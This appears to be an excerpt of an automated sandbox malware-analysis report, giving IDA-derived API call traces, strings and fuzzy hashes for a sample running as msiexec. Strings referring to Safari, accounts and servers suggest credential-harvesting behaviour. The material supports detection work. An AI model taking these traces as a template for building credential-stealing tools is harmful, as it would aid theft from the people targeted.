                                                                                                          • Part of subcall function 0040ECD8: ??2@YAPAXI@Z.MSVCRT(00000000), ref: 0040ECF9
                                                                                                          • Part of subcall function 0040ECD8: ??3@YAXPAX@Z.MSVCRT(00000000), ref: 0040EDC0
                                                                                                        • GetStdHandle.KERNEL32(000000F5), ref: 00410530
                                                                                                        • CloseHandle.KERNELBASE(?), ref: 00410654
                                                                                                          • Part of subcall function 004096DC: CreateFileW.KERNELBASE(00000001,40000000,00000001,00000000,00000002,00000000,00000000,0040E0F1,00000104), ref: 004096EE
                                                                                                          • Part of subcall function 0040973C: GetLastError.KERNEL32 ref: 00409750
                                                                                                          • Part of subcall function 0040973C: _snwprintf.MSVCRT ref: 0040977D
                                                                                                          • Part of subcall function 0040973C: MessageBoxW.USER32(?,?,Error,00000030), ref: 00409796
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000E.00000002.2576899980.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Handle$??2@??3@CloseCreateErrorFileLastMessage_snwprintf
                                                                                                        • String ID:
                                                                                                        • API String ID: 1381354015-0
                                                                                                        • Opcode ID: 331637186d7fda146188de6d28ea3842bad20729486783243114fed48956b45e
                                                                                                        • Instruction ID: c777e68e994987bb064ab7fb99de871126f79ef1b866bcb434911d427814d160
                                                                                                        • Opcode Fuzzy Hash: 331637186d7fda146188de6d28ea3842bad20729486783243114fed48956b45e
                                                                                                        • Instruction Fuzzy Hash: BE417231A00204EFCB25AF65C885A9E77B6EF84711F20446FF446A7291C7B99EC0DE59
                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000E.00000002.2576899980.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: free
                                                                                                        • String ID:
                                                                                                        • API String ID: 1294909896-0
                                                                                                        • Opcode ID: cbd9f9e03ce833727f217058398efad0a096bf54ba10072877aeedcd786ebb4c
                                                                                                        • Instruction ID: 7f33cc2486ffea160e999b9abaf125df84647c5341351ad01334bd221cd3bada
                                                                                                        • Opcode Fuzzy Hash: cbd9f9e03ce833727f217058398efad0a096bf54ba10072877aeedcd786ebb4c
                                                                                                        • Instruction Fuzzy Hash: 32D042B0404B008ED7B0DF39D401602BBF0AB093143118D2E90AAC2A50E775A0149F08
                                                                                                        APIs
                                                                                                          • Part of subcall function 00403A16: memset.MSVCRT ref: 00403A55
                                                                                                          • Part of subcall function 0040A02C: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,02000000,00000000,00000000,00000000,004039CA,00000000,?,00000000,?,00000000), ref: 0040A044
                                                                                                          • Part of subcall function 0040A02C: GetFileTime.KERNEL32(00000000,00000000,00000000,?), ref: 0040A058
                                                                                                          • Part of subcall function 0040A02C: CloseHandle.KERNELBASE(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,004455D5), ref: 0040A061
                                                                                                        • CompareFileTime.KERNEL32(?,?,00000000,?,00000000), ref: 004039D4
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000E.00000002.2576899980.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: File$Time$CloseCompareCreateHandlememset
                                                                                                        • String ID:
                                                                                                        • API String ID: 2154303073-0
                                                                                                        • Opcode ID: 56a49437465c6dd79f718b685576690655c489aaf9a54b49d185ed9555da5ee2
                                                                                                        • Instruction ID: d476be81a684c5cf971044fbd14bb177a9e73989d843208b34704cc982626f94
                                                                                                        • Opcode Fuzzy Hash: 56a49437465c6dd79f718b685576690655c489aaf9a54b49d185ed9555da5ee2
                                                                                                        • Instruction Fuzzy Hash: 11111CB6D00218ABCB11EFA5D9415DEBBB9EF44315F20407BE841F7281DA389F45CB95
                                                                                                        APIs
                                                                                                          • Part of subcall function 004135E0: FreeLibrary.KERNELBASE(?,00413603,00000000,0044557A,?,?,?,?,?,00403335,?), ref: 004135EC
                                                                                                          • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                                                          • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                                                                                                          • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                                                          • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                                                          • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                                                                                                          • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                                                                                                        • GetProcAddress.KERNEL32(?,00000000), ref: 0041362A
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000E.00000002.2576899980.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Library$Load$AddressDirectoryFreeProcSystemmemsetwcscatwcscpy
                                                                                                        • String ID:
                                                                                                        • API String ID: 3150196962-0
                                                                                                        • Opcode ID: e8610485fa55ef6227a98938b97cf07d3e826c2ed4ae4196069be0aa637d7783
                                                                                                        • Instruction ID: 35a9ad0fe6b4507ee66bae46934dcfd2e139bf0842d10804986ce3ee8b034d80
                                                                                                        • Opcode Fuzzy Hash: e8610485fa55ef6227a98938b97cf07d3e826c2ed4ae4196069be0aa637d7783
                                                                                                        • Instruction Fuzzy Hash: BBF0A4311447126AE6306B7AAC02BE762849F00725F10862EB425D55D1EFA8D5C046AC
                                                                                                        APIs
                                                                                                        • SetFilePointerEx.KERNELBASE(0040627C,?,?,00000000,00000000,00000000,004068F9,00000000,00000000,?,00000000,0040627C), ref: 004062C2
                                                                                                          • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000E.00000002.2576899980.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: File$PointerRead
                                                                                                        • String ID:
                                                                                                        • API String ID: 3154509469-0
                                                                                                        • Opcode ID: f15afef8f4b97f48ba7652cd85e3a24bc41a353f13de395cadc5358a8aad8795
                                                                                                        • Instruction ID: d794e9b43e5f56b2d2e2073d65b81241c22a9a75ad02cc9b2284f18e77a2fe0f
                                                                                                        • Opcode Fuzzy Hash: f15afef8f4b97f48ba7652cd85e3a24bc41a353f13de395cadc5358a8aad8795
                                                                                                        • Instruction Fuzzy Hash: 45E01276100100FFE6619B05DC06F57FBB9FBD4710F14883DB59596174C6326851CB25
                                                                                                        APIs
                                                                                                        • GetPrivateProfileIntW.KERNEL32(?,?,?,?), ref: 00414588
                                                                                                          • Part of subcall function 004143F1: memset.MSVCRT ref: 00414410
                                                                                                          • Part of subcall function 004143F1: _itow.MSVCRT ref: 00414427
                                                                                                          • Part of subcall function 004143F1: WritePrivateProfileStringW.KERNEL32(?,?,00000000), ref: 00414436
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000E.00000002.2576899980.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: PrivateProfile$StringWrite_itowmemset
                                                                                                        • String ID:
                                                                                                        • API String ID: 4232544981-0
                                                                                                        • Opcode ID: 58bd15f6e23597088465cc0f12acd7a0529fd6d647dc9a4ec136155e63c93ad6
                                                                                                        • Instruction ID: 104e910b762de94586eb11e4c264cf061db1895f8dce3fe8c281d71359574313
                                                                                                        • Opcode Fuzzy Hash: 58bd15f6e23597088465cc0f12acd7a0529fd6d647dc9a4ec136155e63c93ad6
                                                                                                        • Instruction Fuzzy Hash: 8EE09232000209ABDF125F91EC01AA93B66FF54315F548469F95C05520D33295B0AB59
                                                                                                        APIs
                                                                                                        • FreeLibrary.KERNELBASE(?,?,004452FB,?,?,?,0040333C,?), ref: 00444A65
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000E.00000002.2576899980.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: FreeLibrary
                                                                                                        • String ID:
                                                                                                        • API String ID: 3664257935-0
                                                                                                        • Opcode ID: 8c39ef9eaf727128d218f1dddc73c1f621731b9859e7ea9690b0e693fd97a8de
                                                                                                        • Instruction ID: 9043d1e372537a54137ae43dcd20834ee918eeaa55a47e8e1dedab4d47514996
                                                                                                        • Opcode Fuzzy Hash: 8c39ef9eaf727128d218f1dddc73c1f621731b9859e7ea9690b0e693fd97a8de
                                                                                                        • Instruction Fuzzy Hash: E2E0F6B5900B018FD3708F1BE944406FBF8BFE56113108A1FD4AAC2A24D7B4A1898F54
                                                                                                        APIs
                                                                                                          • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(00000000,psapi.dll), ref: 00413F6F
                                                                                                          • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(?,EnumProcessModules), ref: 00413F7B
                                                                                                          • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(?,GetModuleFileNameExW), ref: 00413F87
                                                                                                          • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(?,EnumProcesses), ref: 00413F93
                                                                                                          • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(?,GetModuleInformation), ref: 00413F9F
                                                                                                        • K32GetModuleFileNameExW.KERNEL32(00000104,00000000,00413E1F,00000104,00413E1F,00000000,?), ref: 00413F46
Memory Dump Source
• Source File: 0000000E.00000002.2576899980.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
Similarity
• API ID: AddressProc$FileModuleName
• String ID:
• API String ID: 3859505661-0
APIs
• ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
Similarity
• API ID: FileRead
• String ID:
• API String ID: 2738559852-0
APIs
• WriteFile.KERNELBASE(?,00000009,?,00000000,00000000,?,?,00402F9B,?,00000000,00000000,00000000,0000017E), ref: 0040A325
Similarity
• API ID: FileWrite
• String ID:
• API String ID: 3934441357-0
APIs
• FreeLibrary.KERNELBASE(00000000,004457F2,00000000,000001F7,00000000), ref: 00413D30
Similarity
• API ID: FreeLibrary
• String ID:
• API String ID: 3664257935-0
APIs
• CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
Similarity
• API ID: CreateFile
• String ID:
• API String ID: 823142352-0
APIs
• CreateFileW.KERNELBASE(00000001,40000000,00000001,00000000,00000002,00000000,00000000,0040E0F1,00000104), ref: 004096EE
Similarity
• API ID: CreateFile
• String ID:
• API String ID: 823142352-0
APIs
• ??3@YAXPAX@Z.MSVCRT(00000000,00401B44,0044E518,?,00000001,00401B95,?,00401EE4), ref: 0040B052
Similarity
• API ID: ??3@
• String ID:
• API String ID: 613200358-0
APIs
• FreeLibrary.KERNELBASE(?,00413603,00000000,0044557A,?,?,?,?,?,00403335,?), ref: 004135EC
Similarity
• API ID: FreeLibrary
• String ID:
• API String ID: 3664257935-0
APIs
• EnumResourceNamesW.KERNELBASE(?,?,Function_000148B6,00000000), ref: 0041494B
Similarity
• API ID: EnumNamesResource
• String ID:
• API String ID: 3334572018-0
APIs
• FreeLibrary.KERNELBASE(?), ref: 0044DEB6
Similarity
• API ID: FreeLibrary
• String ID:
• API String ID: 3664257935-0
APIs
• FindClose.KERNELBASE(?,0040AE21,?,00000000,00445EF5,*.*,?,00000000,?,00000104,?,?,?,?,?,00000104), ref: 0040AEC8
Similarity
• API ID: CloseFind
• String ID:
• API String ID: 1863332320-0
APIs
• GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
Similarity
• API ID: AttributesFile
• String ID:
• API String ID: 3188754299-0
APIs
• memset.MSVCRT ref: 004095FC
  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
  • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
  • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
  • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
  • Part of subcall function 004091B8: memset.MSVCRT ref: 004091E2
  • Part of subcall function 004091B8: memcpy.MSVCRT(?,00000000,?,?,?,?,?,?,?,?,?,?,00000143,00000000), ref: 004092C9
  • Part of subcall function 004091B8: memcmp.MSVCRT(00000000,0045A4F0,00000006,?,?,?,?,?,?,?,?,?,?,?,?,00000143), ref: 004092D9
Similarity
• API ID: memsetwcslen$AttributesFilememcmpmemcpywcscatwcscpy
• String ID:
• API String ID: 3655998216-0
APIs
• memset.MSVCRT ref: 00445426
  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
  • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
  • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
  • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
  • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B71C
  • Part of subcall function 0040B6EF: wcsrchr.MSVCRT ref: 0040B738
  • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B756
  • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B7F5
  • Part of subcall function 0040B6EF: CreateFileW.KERNELBASE(00445FAE,80000000,00000000,00000000,00000003,00000000,00000000,?,?), ref: 0040B80C
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000E.00000002.2576899980.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: memset$Filewcslen$AttributesCreatewcscatwcscpywcsrchr
                                                                                                        • String ID:
                                                                                                        • API String ID: 1828521557-0
                                                                                                        • Opcode ID: ea4a949cbb04dc179977b6e9e50e7a1e4e6e0668b18cbdf2d6b9d2270a501428
                                                                                                        • Instruction ID: 9d1500c39017731ad640c46c84131142cb98d7893e2d711cbdbff08f65233ce4
                                                                                                        • Opcode Fuzzy Hash: ea4a949cbb04dc179977b6e9e50e7a1e4e6e0668b18cbdf2d6b9d2270a501428
                                                                                                        • Instruction Fuzzy Hash: 4B1186B294011D7BEB10E751DC4AFDB776CEF51328F10047FB518A50C2E6B8AAC486A9

APIs
  • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT(00000001,00000001,00401E7F), ref: 0040AFD8
  • Part of subcall function 004062A6: SetFilePointerEx.KERNELBASE(0040627C,?,?,00000000,00000000,00000000,004068F9,00000000,00000000,?,00000000,0040627C), ref: 004062C2
• memcpy.MSVCRT(00000000,00000000,?,00000000,00000000,?,00000000,0040627C), ref: 00406942
Similarity
• API ID: ??2@FilePointermemcpy
• String ID:
• API String ID: 609303285-0
• Opcode ID: 9e8b65249caf6329f4b4caa46943be568ceb14fc1399993bad7d332d27558272
• Instruction ID: a147fa8ec668463fbbadbca9a08a444fcb23aa95a0ceadfc627c4072e562ebd5
• Instruction Fuzzy Hash: 4B11A7B2500108BBDB11A755C840F9F77ADDF85318F16807AF90677281C778AE2687A9

APIs
Similarity
• API ID: _wcsicmp
• String ID:
• API String ID: 2081463915-0
• Opcode ID: 8ecd19cd50b91feb9ece7647b88d70c74935930258f67524a15d6916c2203edb
• Instruction ID: 44e68c08f8902dbc9d3bec9e3d7b81d72528a2b8c41660eeece459a1934edfa0
• Instruction Fuzzy Hash: 0C118CB1600205AFD710DF65C8809AAB7F8FF44314F11843EE55AE7240EB34F9658B68

APIs
  • Part of subcall function 00406294: CloseHandle.KERNEL32(000000FF,00406224,00000000,00000000,0040E03C,?,00000000,00000104,00000000,?,?,?,0040E521,?,0040E6A3,000000FF), ref: 0040629C
  • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
• GetLastError.KERNEL32(00000000,00000000,0040E03C,?,00000000,00000104,00000000,?,?,?,0040E521,?,0040E6A3,000000FF,?,00000104), ref: 00406281
  • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
Similarity
• API ID: File$CloseCreateErrorHandleLastRead
• String ID:
• API String ID: 2136311172-0
• Opcode ID: b6bd1096ce10d17f9a7701a6d0a27b928aedeb77931263aba22673ea05e1db24
• Instruction ID: 5eec059ee86d0bbb8aaa5289f200f29bbda103cdac5cb86a40c163b72aa3aa4c
• Instruction Fuzzy Hash: 3F01D6B14017018FD7206B70CD05BA273D8EF10319F11897EE55BE62D1EB3C9861866E

APIs
  • Part of subcall function 0040B04B: ??3@YAXPAX@Z.MSVCRT(00000000,00401B44,0044E518,?,00000001,00401B95,?,00401EE4), ref: 0040B052
• ??2@YAPAXI@Z.MSVCRT(00000001,00000001,00401E7F), ref: 0040AFD8
Similarity
• API ID: ??2@??3@
• String ID:
• API String ID: 1936579350-0
• Opcode ID: 89281d6a79f9a2f09b4aea459eeecc0a1f6d8faaa22ddda06fad7d30ca0037ac
• Instruction ID: 89dc8af08517091935dcea8fd058adf4401913b4726dbdea6cb301b2924d739e
• Instruction Fuzzy Hash: 8FC02B7240C2100FD730FF74340205736D4CE422203028C2FE0E4D3101DB3C840103C8

APIs
Similarity
• API ID: free
• String ID:
• API String ID: 1294909896-0
• Opcode ID: 064fc9ad2ab7598503b0803575f79bda8c80cd2f5cc7d751fc92f1905ed38621
• Instruction ID: 84c58710a9e867f17c2d1ed9f7495b278bdfae561cd9e9721482330d0bfefd66
• Instruction Fuzzy Hash: 48C00272510B018FEB209E16C405762B3E4AF5173BF928C1D949591481D77CE4448A1D

APIs
Similarity
• API ID: free
• String ID:
• API String ID: 1294909896-0
• Opcode ID: 724fdfa704f09a621e121349248af22099a797a76fc60927f41904971c9b5f98
• Instruction ID: 146ea39d6618054f0b1de7ea1636ea0e57db3b52e0d7afa8327ef8e2ad9437d0
• Instruction Fuzzy Hash: 18C012B29107018BFB308E15C409322B2E4AF0072BFA18C0D9090910C2C77CD080CA18

APIs
Similarity
• API ID: free
• String ID:
• API String ID: 1294909896-0
• Opcode ID: c64955702a5dc36c53a796a23ab56cc8adc6c768dfa77ba71ac51c435adf9ecd
• Instruction ID: e7ff0dbf640816315c9486a8db62c76896ac9b8339bf6d895034c27267ad2de3
• Instruction Fuzzy Hash: A5A022A200820023CC00AB3CCC02A0A33880EE323EB320B0EB032C20C2CF38C830B00E

APIs
• EmptyClipboard.USER32 ref: 004098EC
  • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
• GetFileSize.KERNEL32(00000000,00000000), ref: 00409909
• GlobalAlloc.KERNEL32(00002000,00000002), ref: 0040991A
• GlobalLock.KERNEL32(00000000), ref: 00409927
• ReadFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 0040993A
• GlobalUnlock.KERNEL32(00000000), ref: 0040994C
• SetClipboardData.USER32(0000000D,00000000), ref: 00409955
• GetLastError.KERNEL32 ref: 0040995D
• CloseHandle.KERNEL32(?), ref: 00409969
• GetLastError.KERNEL32 ref: 00409974
• CloseClipboard.USER32 ref: 0040997D
Similarity
• API ID: ClipboardFileGlobal$CloseErrorLast$AllocCreateDataEmptyHandleLockReadSizeUnlock
• String ID:
• API String ID: 3604893535-0
• Opcode ID: 92cf2ad6ca5c713dde206082ad36a5e7808ef459d862ee33826dd65d962f9f86
• Instruction ID: b216396755dc4e0bfb1664a9ae46c4c33dbc75b884417c11e98c88a04b476fe2
• Instruction Fuzzy Hash: 3D113D7A540204BBE7105FA6DC4CA9E7B78FB06356F10457AF902E22A1DB748901CB69

APIs
• LoadLibraryW.KERNEL32(comctl32.dll), ref: 004044C3
• GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 004044D5
• FreeLibrary.KERNEL32(00000000), ref: 004044E9
• MessageBoxW.USER32(00000001,Error: Cannot load the common control classes.,Error,00000030), ref: 00404514
Similarity
• API ID: Library$AddressFreeLoadMessageProc
• String ID: Error$Error: Cannot load the common control classes.$InitCommonControlsEx$comctl32.dll
• API String ID: 2780580303-317687271
• Opcode ID: 4451af1fa5a3c13e403cd0bd9a94ec580510088b32cd85f0031bb893d40152de
• Instruction ID: 703d86131c3dcb59aab6256491fb2853d543806c906e0642a055f98632e98cc8
• Instruction Fuzzy Hash: B201D6757502217BE7112FB69C49F7B7A9CFF82749B000035E601E2180EAB8D901926D

APIs
• EmptyClipboard.USER32 ref: 00409882
• wcslen.MSVCRT ref: 0040988F
• GlobalAlloc.KERNEL32(00002000,00000002,?,?,?,?,00411A1E,-00000210), ref: 0040989F
• GlobalLock.KERNEL32(00000000), ref: 004098AC
• memcpy.MSVCRT(00000000,?,00000002,?,?,?,00411A1E,-00000210), ref: 004098B5
• GlobalUnlock.KERNEL32(00000000), ref: 004098BE
• SetClipboardData.USER32(0000000D,00000000), ref: 004098C7
• CloseClipboard.USER32 ref: 004098D7
Similarity
• API ID: ClipboardGlobal$AllocCloseDataEmptyLockUnlockmemcpywcslen
• String ID:
• API String ID: 1213725291-0
• Opcode ID: ef81b411bc32b98b0d58beac2f1626bda71a649682fb6f24e39e44ffb2f3f244
• Instruction ID: b754b6ca90195c8d8a6f67e3e00c953256c5cf8724ac1a445a604cc17dd28da6
• Instruction Fuzzy Hash: 4AF0967B1402246BD2112FA6AC4DD2B772CFB86B56B05013AF90592251DA3448004779
APIs
• GetLastError.KERNEL32 ref: 004182D7
  • Part of subcall function 0041739B: GetVersionExW.KERNEL32(?), ref: 004173BE
• FormatMessageW.KERNEL32(00001300,00000000,00000000,00000000,?,00000000,00000000), ref: 004182FE
• FormatMessageA.KERNEL32(00001300,00000000,00000000,00000000,?,00000000,00000000), ref: 00418327
• LocalFree.KERNEL32(?), ref: 00418342
• free.MSVCRT ref: 00418370
  • Part of subcall function 00417434: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,00000000,00000000,00000000,?,?,7591DF80,?,0041755F,?), ref: 00417452
  • Part of subcall function 00417434: malloc.MSVCRT ref: 00417459
Strings
Memory Dump Source
• Source File: 0000000E.00000002.2576899980.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
Similarity
• API ID: FormatMessage$ByteCharErrorFreeLastLocalMultiVersionWidefreemalloc
• String ID: OsError 0x%x (%u)
• API String ID: 2360000266-2664311388
APIs
  • Part of subcall function 00409A45: GetTempPathW.KERNEL32(00000104,?,00445FAE), ref: 00409A5C
  • Part of subcall function 00409A45: GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 00409A6E
  • Part of subcall function 00409A45: GetTempFileNameW.KERNELBASE(?,0040B827,00000000,?), ref: 00409A85
• OpenClipboard.USER32(?), ref: 00411878
• GetLastError.KERNEL32 ref: 0041188D
  • Part of subcall function 004098E2: EmptyClipboard.USER32 ref: 004098EC
  • Part of subcall function 004098E2: GetFileSize.KERNEL32(00000000,00000000), ref: 00409909
  • Part of subcall function 004098E2: GlobalAlloc.KERNEL32(00002000,00000002), ref: 0040991A
  • Part of subcall function 004098E2: GlobalLock.KERNEL32(00000000), ref: 00409927
  • Part of subcall function 004098E2: ReadFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 0040993A
  • Part of subcall function 004098E2: GlobalUnlock.KERNEL32(00000000), ref: 0040994C
  • Part of subcall function 004098E2: SetClipboardData.USER32(0000000D,00000000), ref: 00409955
  • Part of subcall function 004098E2: CloseHandle.KERNEL32(?), ref: 00409969
  • Part of subcall function 004098E2: CloseClipboard.USER32 ref: 0040997D
Memory Dump Source
• Source File: 0000000E.00000002.2576899980.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
Similarity
• API ID: Clipboard$FileGlobal$CloseTemp$AllocDataDirectoryEmptyErrorHandleLastLockNameOpenPathReadSizeUnlockWindows
• String ID:
• API String ID: 2628231878-0
Memory Dump Source
• Source File: 0000000E.00000002.2576899980.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
Similarity
• API ID: ??2@??3@memcpymemset
• String ID:
• API String ID: 1865533344-0
APIs
• GetVersionExW.KERNEL32(?), ref: 004173BE
Memory Dump Source
• Source File: 0000000E.00000002.2576899980.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
Similarity
• API ID: Version
• String ID:
• API String ID: 1889659487-0
APIs
• NtdllDefWindowProc_W.NTDLL(?,?,?,?,00401B0D,?,?,?), ref: 004018D2
Memory Dump Source
• Source File: 0000000E.00000002.2576899980.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
Similarity
• API ID: NtdllProc_Window
• String ID:
• API String ID: 4255912815-0
APIs
• _wcsicmp.MSVCRT ref: 004022A6
• _wcsicmp.MSVCRT ref: 004022D7
• _wcsicmp.MSVCRT ref: 00402305
• _wcsicmp.MSVCRT ref: 00402333
  • Part of subcall function 0040AA29: wcslen.MSVCRT ref: 0040AA3C
  • Part of subcall function 0040AA29: memcpy.MSVCRT(?,?,00000000,00000001,00401B3C,0044E518,?,00000001,00401B95,?,00401EE4), ref: 0040AA5B
• memset.MSVCRT ref: 0040265F
• memcpy.MSVCRT(?,?,00000011), ref: 0040269B
  • Part of subcall function 00404423: GetProcAddress.KERNEL32(?,00000000), ref: 00404453
  • Part of subcall function 00404423: FreeLibrary.KERNEL32(00000000,00000141,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404476
• memcpy.MSVCRT(?,?,0000001C,?,?,00000000,?), ref: 004026FF
• LocalFree.KERNEL32(?,?,?,00000000,?,?,00000000,?), ref: 00402764
• FreeLibrary.KERNEL32(00000000,?,?,00000000,?), ref: 00402775
Strings
Memory Dump Source
• Source File: 0000000E.00000002.2576899980.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
Similarity
• API ID: _wcsicmp$Freememcpy$Library$AddressLocalProcmemsetwcslen
• String ID: !$#$$$&$&$'$)$/$0$2$8$=$>$>$@$A$Account$Data$F$H$H$I$K$K$L$O$Path$S$X$\$^$`$a$b$com.apple.Safari$com.apple.WebKit2WebProcess$g$h$n$n$q$server$t$t$t$u$u$w$y$y$z${$}$~
• API String ID: 577499730-1134094380
APIs
Strings
Memory Dump Source
• Source File: 0000000E.00000002.2576899980.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
Similarity
• API ID: _wcsicmpmemset$_wcsnicmpwcslen$ByteCharMultiWidewcschrwcscpy$memcpystrchrstrlen
• String ID: :stringdata$ftp://$http://$https://
• API String ID: 2787044678-1921111777
APIs
• GetDlgItem.USER32(?,000003E9), ref: 0041402F
• GetDlgItem.USER32(?,000003E8), ref: 0041403B
• GetWindowLongW.USER32(00000000,000000F0), ref: 0041404A
• GetWindowLongW.USER32(?,000000F0), ref: 00414056
• GetWindowLongW.USER32(00000000,000000EC), ref: 0041405F
• GetWindowLongW.USER32(?,000000EC), ref: 0041406B
• GetWindowRect.USER32(00000000,?), ref: 0041407D
• GetWindowRect.USER32(?,?), ref: 00414088
• MapWindowPoints.USER32(00000000,?,?,00000002), ref: 0041409C
• MapWindowPoints.USER32(00000000,?,?,00000002), ref: 004140AA
• GetDC.USER32 ref: 004140E3
• wcslen.MSVCRT ref: 00414123
• GetTextExtentPoint32W.GDI32(?,00000000,00000000,?), ref: 00414134
• ReleaseDC.USER32(?,?), ref: 00414181
